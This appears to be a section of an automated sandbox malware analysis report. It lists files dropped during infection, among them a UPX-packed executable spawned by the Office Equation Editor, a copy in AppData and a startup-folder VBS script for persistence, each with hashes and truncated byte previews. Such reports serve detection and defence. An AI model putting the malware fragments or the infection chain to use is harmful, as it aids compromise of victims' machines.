                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autF384.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autF9B.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autFA08.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autFA56.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autFBB.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autFBDD.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autFE6B.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autFEF8.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autFF95.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autFFB4.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\differences

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):492544
                                                    Entropy (8bit):7.681480980447604
                                                    Encrypted:false
                                                    SSDEEP:12288:qL3HK7NKuvO6CzFmYDV0C2qk0tRi8enXWXOe:qLXuKgO6CzFzHC0tThL
                                                    MD5:134B1F6D71374D538D0CE5268BC547D2
                                                    SHA1:4ED396631E1F50ADFECEBDAD795152AD189F1516
                                                    SHA-256:6DDF551C3D7019061800785CC189ED10619EA9BF3234F5504E1CED315D0D2E96
                                                    SHA-512:D108362AA77DCF0C824B2090F58F7F6AD0F53D76FAD5AB6FE9271330BFE3337262B82CE9A5150E03139DF8ED9C42417C9EEEB12CC1847067F91C20E7CBE64539
                                                    Malicious:false
                                                    Preview:...5YPDE1CBL.09.R2K77RUt42VZRVN05ZPDE5CBL2F09SR2K77RU442VZR^O05TO.K5.K...1u.sf#^Dr%F[U$;?v-Q[4?0eW&b>G(.P=rv.d.?:PQ.[WXrN05ZPDE.j...........8.......<.p.W..N....q...{j.......D.....p.......f..........|..b...}.......#.......At.....Eo......g*!$....SR2K77RUdq2V.SSN[.~7DE5CBL2F.9QS9J9'R5142vXRVN05`kGE5SBL2659SRrK7'RU462V_RWN05ZPAE4CBL2F0.TR2O77RU440VZ.VN 5Z@DE5CRL2V09SR2K'7RU442VZRVN..\P@D5CB,5F.qSR2K77RU442VZRVN05Z.CE.xBL".69kR2K77RU442VZRVN05ZP..3CZL2Fx.URrK77RU442VZRV>55.TDE5CBL2F09SR2K77RU442VZRVN.A?(0E5C_.7F0)SR2+27RQ442VZRVN05ZPDE.CB,.4TX'32K7.SU4D7VZ.WN0Q_PDE5CBL2F09SRrK7w|1U@SVZR:.05ZPCE5MBL2.69SR2K77RU442V.RV..G)"'E5C..2F0YTR2.77R.242VZRVN05ZPDEuCB..4UU<12K..RU4.5VZnVN0}]PDE5CBL2F09SRrK7uRU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5C

                                                    C:\Users\user\AppData\Local\Temp\ferritic

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):148498
                                                    Entropy (8bit):2.778002170706123
                                                    Encrypted:false
                                                    SSDEEP:192:mNxyGyDZFui0E6f/hMMVQc3GkcVoudfSq5+vLkL/IXoWq/qb35mwBgZNFJahYUt4:3
                                                    MD5:B97CFA7D4C0914EF3BB656CF7B6A95C6
                                                    SHA1:E6C61C2A88F83B07A868E7B4F8C6496697944445
                                                    SHA-256:069ECC03912BF679890E24416E068607345F8C77C7968F75CE52775C471D676F
                                                    SHA-512:4233719255F746DD17B22C0FBFA60AAB086C71DE4078B75E7E921BBB5432B35522D04BCB5C3D92BBF4E56D29E950FD8FBAFA06C0B69E97E5D3F73301B181782B
                                                    Malicious:false
                                                    Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

                                                    C:\Users\user\AppData\Local\Temp\kudo.exe

                                                    Download File
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...v.Wg.........."......`...`...p..0.............@..........................@............@...@.......@......................-..$........M...................1..........................................H...........................................UPX0.....p..............................UPX1.....`.......^..................@....rsrc....`.......R...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                    C:\Users\user\AppData\Local\complacence\outvaunts.exe

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...v.Wg.........."......`...`...p..0.............@..........................@............@...@.......@......................-..$........M...................1..........................................H...........................................UPX0.....p..............................UPX1.....`.......^..................@....rsrc....`.......R...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):282
                                                    Entropy (8bit):3.413807597635301
                                                    Encrypted:false
